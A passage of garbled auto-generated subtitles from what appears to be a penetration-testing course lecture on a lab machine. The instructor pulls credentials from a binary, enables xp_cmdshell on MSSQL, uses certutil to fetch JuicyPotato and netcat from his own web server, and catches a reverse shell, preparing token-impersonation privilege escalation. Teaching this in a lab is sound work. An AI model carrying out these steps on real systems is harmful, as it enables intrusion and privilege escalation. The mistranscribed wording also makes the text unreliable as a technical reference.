discriminate strings against Testor. 809 01:03:21,020 --> 01:03:23,030 You know, we could search through it that way. 810 01:03:24,200 --> 01:03:27,710 Let's make sure that the winds are at least 10 characters long. 811 01:03:35,130 --> 01:03:39,450 There we go, right, you see it there, that way I'm another way you could have done this as if you 812 01:03:39,450 --> 01:03:41,010 did like zero grap 813 01:03:44,250 --> 01:03:49,290 color equals always kissing sensitive shoreline numbers. 814 01:03:51,510 --> 01:03:54,300 Let's see, treat binaries like text. 815 01:03:54,390 --> 01:03:59,990 That's what he e regular expression you could do, like pass 816 01:04:02,610 --> 01:04:11,820 KRED or keep you looking for any of these strings would pass past, would create or keep inside of actually 817 01:04:12,600 --> 01:04:16,980 the only possibility if would have passed inside of Testor. 818 01:04:18,870 --> 01:04:22,620 And you would immediately find it this way because a couple of different ways to find it. 819 01:04:22,620 --> 01:04:25,860 I just wanted to show you those ways that you could use radar. 820 01:04:28,080 --> 01:04:35,220 We use strings or you could use grep with the TAC A to treat winery's like text. 821 01:04:35,250 --> 01:04:35,970 Very cool, right. 822 01:04:36,810 --> 01:04:40,350 So let's go ahead and open up our file 823 01:04:47,710 --> 01:04:47,920 put 824 01:04:54,750 --> 01:04:54,840 in 825 01:04:57,690 --> 01:04:59,730 and we're going to want that 826 01:05:03,800 --> 01:05:07,170 user idea of s.A and a database or Godb. 827 01:05:07,320 --> 01:05:10,440 I'm going to delete all that related with the credit. 828 01:05:10,470 --> 01:05:13,800 We might need the database later, but I want to keep this simple. 829 01:05:14,610 --> 01:05:16,000 It's how are we going to connect? 830 01:05:16,530 --> 01:05:18,540 Now, there's a couple of things we can do. 831 01:05:19,470 --> 01:05:22,350 We could we could use d'hiver, 832 01:05:26,910 --> 01:05:32,610 which is a visual database, sort of management utility, kind of like SQL Server Management Studio. 833 01:05:33,600 --> 01:05:33,880 Right. 834 01:05:34,320 --> 01:05:38,940 I can open this up, let it work, and we could try to connect that way. 835 01:05:39,330 --> 01:05:41,520 We could also use this tool. 836 01:05:42,360 --> 01:05:45,030 Debrah Universal, database manager. 837 01:05:45,090 --> 01:05:45,390 Right. 838 01:05:46,350 --> 01:05:52,110 So this is the tool that we we could use if we want to manage the DB and you're going to see it's going 839 01:05:52,110 --> 01:05:54,200 to actually pop open and window is going to say, how do you want to connect? 840 01:05:54,210 --> 01:05:55,110 Is it my skill? 841 01:05:55,110 --> 01:05:59,010 Is it Microsoft SQL Server as opposed to just, you know, Oracle? 842 01:05:59,340 --> 01:06:03,690 You know, you basically pick your connector and then you download the driver and then let you in. 843 01:06:03,700 --> 01:06:03,950 Right. 844 01:06:03,960 --> 01:06:09,150 So we can click close on here after we click SQL Server. 845 01:06:09,900 --> 01:06:10,200 Right. 846 01:06:10,350 --> 01:06:11,100 We click next. 847 01:06:12,870 --> 01:06:18,060 And then we just put in our host, put in our credentials. 848 01:06:19,740 --> 01:06:23,970 SQL Server authentication is what we're using and then you can click Test connection to make sure it 849 01:06:23,970 --> 01:06:24,330 works. 850 01:06:28,410 --> 01:06:33,990 Here, it's saying, you know, we need this, my name's SQL Server Driver, so we can download that 851 01:06:36,540 --> 01:06:37,720 in the log and failed. 852 01:06:37,740 --> 01:06:39,120 I probably just didn't copy the right thing. 853 01:06:39,870 --> 01:06:41,780 Let me make sure I have the right credential. 854 01:06:41,830 --> 01:06:43,170 I bet that's the entire string. 855 01:06:44,580 --> 01:06:47,910 Yeah, entire string on my clipboard. 856 01:06:48,000 --> 01:06:49,540 So I just grab this. 857 01:06:50,150 --> 01:06:51,130 Oh, the password. 858 01:06:51,710 --> 01:06:57,870 Well, now back to my column and I'll show you the sequel sequel Shell in a moment. 859 01:06:58,800 --> 01:07:03,060 That's the other way we can get in quick closing. 860 01:07:03,060 --> 01:07:07,290 That didn't let me close it for some reason. 861 01:07:07,740 --> 01:07:09,870 Let's just put the password in connection. 862 01:07:12,780 --> 01:07:19,890 And says we're connected, you got to finish explaining to the tip of the day and which comes after 863 01:07:19,890 --> 01:07:20,440 this message. 864 01:07:20,460 --> 01:07:22,740 So do we want to create a simple database? 865 01:07:22,740 --> 01:07:26,310 We don't tip of the day quite close on that. 866 01:07:26,670 --> 01:07:31,410 Then we can click close, I believe, on the screen back here like this big. 867 01:07:31,890 --> 01:07:39,210 And what we can do now is we can actually go to the sequel ed or whatever, sequel ed and then type 868 01:07:39,210 --> 01:07:41,280 in command and control in order to execute them. 869 01:07:42,520 --> 01:07:42,870 If you right. 870 01:07:42,870 --> 01:07:46,080 Click execute jointer. 871 01:07:46,800 --> 01:07:47,220 Right. 872 01:07:47,250 --> 01:07:50,940 So for example, I could do like S.P.. 873 01:07:53,280 --> 01:07:54,270 What does it configure, 874 01:08:00,420 --> 01:08:03,900 show advanced options. 875 01:08:04,170 --> 01:08:04,770 I believe that's it. 876 01:08:04,780 --> 01:08:09,330 I'm trying to see if we have XP command, which is a way of 877 01:08:12,630 --> 01:08:15,630 controlling their way of executing commands on the database. 878 01:08:18,240 --> 01:08:19,230 So if I then did. 879 01:08:22,270 --> 01:08:26,410 EXPE commensal jointer. 880 01:08:29,350 --> 01:08:33,020 All right, and then if I didn't, I did XP command show. 881 01:08:38,610 --> 01:08:39,470 It's going to work. 882 01:08:41,660 --> 01:08:42,160 It is. 883 01:08:42,170 --> 01:08:45,680 So you can see we correctly configured it and we are running out of the user tally. 884 01:08:46,580 --> 01:08:54,140 And we could even do like cribs for slash cribs to see what our permissions are. 885 01:08:57,260 --> 01:08:57,870 I did something wrong. 886 01:08:57,910 --> 01:09:00,170 I put this in the quote. 887 01:09:03,440 --> 01:09:05,710 And of course, I'm telling you, I think is just prev. 888 01:09:08,690 --> 01:09:09,410 Yeah, that's it. 889 01:09:09,740 --> 01:09:14,270 So because you are perhaps so we're going to take a look at this in a moment, because this one is really 890 01:09:14,270 --> 01:09:16,100 interesting to see and personal privilege. 891 01:09:17,000 --> 01:09:22,010 This is my favorite privilege, escalation of actually through a juicy potato. 892 01:09:22,550 --> 01:09:23,960 There's a bunch of different potatoes. 893 01:09:23,960 --> 01:09:25,850 So there's potato Yuxi. 894 01:09:25,850 --> 01:09:32,810 There is rotten potato, rock, potato, potato, lonely potato, sweet potato and potato. 895 01:09:33,080 --> 01:09:37,430 And all these potatoes are basically a way of tricking a a privileged. 896 01:09:38,240 --> 01:09:42,560 Basically what you're doing is you're men and you're setting up your process as a man in the middle 897 01:09:42,860 --> 01:09:54,050 of the local system to capture a TLM hashes from a privileged process so that you can generate a token 898 01:09:54,770 --> 01:10:02,030 that has integrity system rights, and you can abuse the C impersonate privilege to assume those rights 899 01:10:02,030 --> 01:10:03,050 and escalate your privileges. 900 01:10:03,410 --> 01:10:04,450 I know that sounds crazy. 901 01:10:05,120 --> 01:10:09,770 Don't worry if it doesn't really make a lot of sense right now, I think it will a little bit later 902 01:10:09,770 --> 01:10:10,130 on. 903 01:10:10,700 --> 01:10:19,290 So right now I just want to show you this tool, the sequence and shell eggs at this top pane, rename 904 01:10:19,310 --> 01:10:21,110 its bottom pane sequel, Shell. 905 01:10:22,080 --> 01:10:26,750 And let's go ahead and get this working second sequel Shell. 906 01:10:27,980 --> 01:10:28,700 What do we want to do? 907 01:10:28,700 --> 01:10:30,650 We want the username, which is s.A. 908 01:10:31,310 --> 01:10:35,900 And I just got that from here, the password. 909 01:10:38,270 --> 01:10:46,550 I put that in and then of course we want the database, which I believe is just a capital D. 910 01:10:47,840 --> 01:10:49,220 No, it's our capital D. 911 01:10:51,950 --> 01:10:52,760 Yeah, the server. 912 01:11:01,880 --> 01:11:02,860 So we need to do this again. 913 01:11:12,630 --> 01:11:20,940 And then you have the type go at the end of each command, really do speak, configure XP command show. 914 01:11:23,210 --> 01:11:25,200 Oops, forgot to type reconfigure. 915 01:11:31,590 --> 01:11:35,180 Let's see if it works anyway, month. 916 01:11:38,340 --> 01:11:38,850 It does. 917 01:11:39,360 --> 01:11:42,300 OK, so there's a couple different things we could do, right? 918 01:11:42,540 --> 01:11:47,430 We could try to use Paracha and get a reversal that way. 919 01:11:47,440 --> 01:11:49,020 I like to use living off the land binaries. 920 01:11:49,020 --> 01:11:53,940 We've already shown Parachilna previous lecture, so let's try to use Circuital. 921 01:11:54,120 --> 01:11:54,400 Right. 922 01:11:54,630 --> 01:11:58,440 This is the way that we can download content onto a compromised endpoint. 923 01:11:59,730 --> 01:12:02,430 And I think it's a great thing to know. 924 01:12:03,040 --> 01:12:04,860 Got to laugh out loud. 925 01:12:05,040 --> 01:12:12,280 Bass actually stands for a living off the land binaries and scripts and we can look for certain till 926 01:12:12,300 --> 01:12:19,560 I can show you how you can download content onto an endpoint by using a Microsoft signed binary in a 927 01:12:19,560 --> 01:12:25,430 way that it was never intended to be used for typesetting till here pops up. 928 01:12:25,950 --> 01:12:28,620 It's one of my favorites t one of the functions is download. 929 01:12:33,030 --> 01:12:37,710 Scroll down, you'll see the site you can download, copy that. 930 01:12:40,920 --> 01:12:44,250 What we can do is we can say exponential 931 01:12:47,040 --> 01:12:52,700 toxify, take this out and what we're going to actually end up downloading is a juicy potato. 932 01:12:55,560 --> 01:12:56,610 I'm getting ready for that. 933 01:12:58,770 --> 01:13:00,240 We're going to host it on our local machine. 934 01:13:07,330 --> 01:13:08,260 And that should work. 935 01:13:08,290 --> 01:13:11,170 Now, let's go ahead and make sure that is our IP address. 936 01:13:14,740 --> 01:13:15,630 It's 14, 18, 937 01:13:19,030 --> 01:13:21,370 and then let's go ahead and grab Jaycee potatoe. 938 01:13:33,830 --> 01:13:39,800 This is it now looks like there's a lovely potato, too, didn't even know about that, lots of potatoes 939 01:13:40,790 --> 01:13:46,730 if you like potatoes, man, and this is going to be a fun privilege escalation vector for you. 940 01:13:47,870 --> 01:13:48,390 All right. 941 01:13:48,410 --> 01:13:49,570 I think we just need to grab this. 942 01:13:49,590 --> 01:13:52,610 I think the binaries already pre pre compiled. 943 01:13:55,620 --> 01:14:04,230 Fresh potatoes, let's go and grab this one right click copy link, location 944 01:14:07,170 --> 01:14:10,560 zero you get to of the 945 01:14:15,360 --> 01:14:16,350 final G.C.. 946 01:14:24,560 --> 01:14:24,780 Right. 947 01:14:24,920 --> 01:14:33,860 That is to be executable and that's going to be downloaded before we do, we need to make sure we set 948 01:14:33,860 --> 01:14:34,790 up a Web server. 949 01:14:46,980 --> 01:14:50,970 Looks like this show might have timed out, so let's go in started up again. 950 01:15:08,300 --> 01:15:08,500 It's. 951 01:15:22,670 --> 01:15:31,760 I see Speaker Menschel, my God, that works. 952 01:15:34,100 --> 01:15:39,140 So what we need is a better show and let's just delete this and get that cat on the box. 953 01:15:39,680 --> 01:15:44,740 But could you certainly tell it to download it to a machine and then we can get a real shot that way. 954 01:15:44,780 --> 01:15:51,240 That way we'll get our foothold to see, locate and see that 955 01:15:55,970 --> 01:15:56,960 that's the one we want. 956 01:15:58,430 --> 01:15:59,620 See copy 957 01:16:04,050 --> 01:16:06,380 to this current folder. 958 01:16:09,590 --> 01:16:10,130 All right. 959 01:16:11,300 --> 01:16:13,700 And then we can run in this in. 960 01:16:32,310 --> 01:16:33,630 To download Ngarkat. 961 01:16:43,570 --> 01:16:44,890 Forgot the single quotes. 962 01:16:51,600 --> 01:16:58,890 It's like we took too long to speak, that's how disabled itself is to move really fast when you're 963 01:16:58,890 --> 01:16:59,790 doing this. 964 01:17:15,650 --> 01:17:17,040 The audience cathartically. 965 01:17:19,560 --> 01:17:23,080 It's not there, so we probably need to download it into like a temp folder. 966 01:17:24,450 --> 01:17:28,620 Let's put it into Windows temp. 967 01:17:33,600 --> 01:17:37,880 And then let's see if we can find it that way. 968 01:17:45,720 --> 01:17:47,020 So that's what I found. 969 01:17:47,200 --> 01:17:48,360 Plus, if we can still run it. 970 01:17:51,710 --> 01:17:52,580 He definitely downloaded. 971 01:18:04,310 --> 01:18:04,940 Scoot over. 972 01:18:04,970 --> 01:18:07,110 I'll wrap wrap. 973 01:18:07,410 --> 01:18:10,250 OK, Scooter Affleck and Star RL, wrap 974 01:18:13,390 --> 01:18:16,520 this up, give us UpDown functionality once we get our Windows show. 975 01:18:21,470 --> 01:18:29,600 Scutaro wrap and see a naked minus in the always off names that were both listed on Port four for three, 976 01:18:31,640 --> 01:18:34,350 and then we go up here, we'll say four for three. 977 01:18:34,370 --> 01:18:36,170 Let's make sure that that is our IP 978 01:18:40,010 --> 01:18:43,850 10, 10, 14, 18, as you can see right there. 979 01:18:45,500 --> 01:18:46,100 That's right. 980 01:18:47,120 --> 01:18:48,440 And we'll see how this works. 981 01:18:54,650 --> 01:18:56,470 Now, what we need to do is take this out. 982 01:18:57,830 --> 01:18:59,990 Not passing this Syriatel, we're just running that gap. 983 01:19:04,340 --> 01:19:04,970 And there we go. 984 01:19:05,510 --> 01:19:08,990 Guarascio Daizy am I? 985 01:19:09,890 --> 01:19:10,520 We are, sir. 986 01:19:11,630 --> 01:19:15,890 So let's go to C Drive. 987 01:19:18,890 --> 01:19:27,950 You can see the account directory when we saw the share print, we can see the FTP directory, which 988 01:19:27,950 --> 01:19:29,390 we already saw earlier. 989 01:19:30,650 --> 01:19:32,600 We can see the web server directory. 990 01:19:35,210 --> 01:19:37,670 All right, kiwifruit. 991 01:19:41,540 --> 01:19:42,770 And there's a bunch of stuff in here. 992 01:19:43,790 --> 01:19:45,200 What we're interested in right now 993 01:19:47,720 --> 01:19:50,180 is elevating our privileges, obviously. 994 01:19:52,190 --> 01:19:55,730 But in order to do that, we need to get that Rodden that you see potato to work. 995 01:19:55,730 --> 01:20:01,820 Because if we do well, I prefer to see we have the AC impersonate tokin. 996 01:20:02,690 --> 01:20:03,030 Right. 997 01:20:03,620 --> 01:20:08,720 So if we go back to the FTP 998 01:20:13,370 --> 01:20:14,390 because you see potatoe right. 999 01:20:14,660 --> 01:20:19,580 And if we run this, do you see potatoe? 1000 01:20:19,970 --> 01:20:21,260 You should give us the usage commands. 1001 01:20:21,280 --> 01:20:21,590 Right. 1002 01:20:21,980 --> 01:20:26,750 So the next lecture, we're actually going to talk about using this tool to elevate our privileges from 1003 01:20:26,750 --> 01:20:31,760 a standard user if we do not use our Sara. 1004 01:20:33,920 --> 01:20:39,620 You can see she is just a user local group membership, and that's really it. 1005 01:20:39,770 --> 01:20:46,220 There's no administrator rights putting net users can see there is an administrator user that local 1006 01:20:47,540 --> 01:20:48,950 administrators 1007 01:20:52,070 --> 01:20:53,420 because it is going. 1008 01:20:53,450 --> 01:20:59,690 Let me see that the group for administrators only have one account in their administrators and we are 1009 01:21:00,710 --> 01:21:05,860 Zera User, which is a member of the users group. 1010 01:21:06,320 --> 01:21:09,200 The next lecture we will elevate using GC potatoe. 1011 01:21:09,470 --> 01:21:10,760 I will see you then.